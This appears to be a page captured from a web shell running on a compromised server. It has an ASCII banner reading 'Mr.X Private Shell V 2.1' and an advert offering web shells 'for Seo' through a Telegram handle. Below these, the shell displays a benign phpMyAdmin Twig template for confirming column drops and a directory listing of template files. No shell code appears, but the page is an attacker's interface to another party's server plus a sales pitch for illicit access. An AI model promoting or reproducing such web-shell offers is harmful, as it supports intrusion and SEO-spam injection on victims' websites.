__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<form action="{{ url('/table/structure/drop') }}" method="post" class="disableAjax">
{{ get_hidden_inputs({'db': db, 'table': table, 'selected': fields}) }}
<fieldset class="pma-fieldset confirmation">
<legend>
{% trans 'Do you really want to execute the following query?' %}
</legend>
<code>
ALTER TABLE {{ backquote(table) }}<br>
{% for field in fields %}
DROP {{ backquote(field) }}
{%- if loop.last %};{% else %},<br>{% endif %}
{% endfor %}
</code>
</fieldset>
<fieldset class="pma-fieldset tblFooters">
<input id="buttonYes" class="btn btn-secondary" type="submit" name="mult_btn" value="{% trans 'Yes' %}">
<input id="buttonNo" class="btn btn-secondary" type="submit" name="mult_btn" value="{% trans 'No' %}">
</fieldset>
</form>
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| display_partitions.twig | File | 10.05 KB | 0644 |
|
| display_structure.twig | File | 32.21 KB | 0644 |
|
| display_table_stats.twig | File | 7.41 KB | 0644 |
|
| drop_confirm.twig | File | 826 B | 0644 |
|
| partition_definition_form.twig | File | 576 B | 0644 |
|
| primary.twig | File | 931 B | 0644 |
|